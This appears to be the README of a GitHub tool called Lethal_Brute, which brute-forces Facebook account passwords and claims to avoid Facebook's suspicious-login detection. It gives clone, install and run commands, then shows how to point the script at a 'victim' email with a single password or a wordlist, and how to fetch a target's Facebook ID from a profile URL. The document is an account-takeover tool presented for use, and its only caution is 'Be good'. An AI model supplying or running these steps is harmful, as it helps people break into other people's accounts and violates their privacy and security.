Lets you bruteforce facebook without any suspicious login by facebook
$ git clone https://github.com/g1ng3rb1t3/Lethal_Brute
$ cd Lethal_Brute
$ chmod +x install.sh
$ ./install.sh
$ python3 lebrute.py [option]
python3 lebrute.py -v [email protected] -p 00000001
python3 lebrute.py -v [email protected] -w [wordlist path]
$ python3 lebrute.py -f [victim/target url]
-------example-------
$ python3 lebrute.py -f https://www.facebook.com/g1ng3rb1t3
python lebrute.py -check
python lebrute.py -about
Not tested on many devices. But works on my device
[>] Internet connection
[>] Be good
-v is victim
-p is single password
-w is wordlist
-f is fetch. For getting facebook ID
-c is check or update. Basically checks for script version and updates it if not new version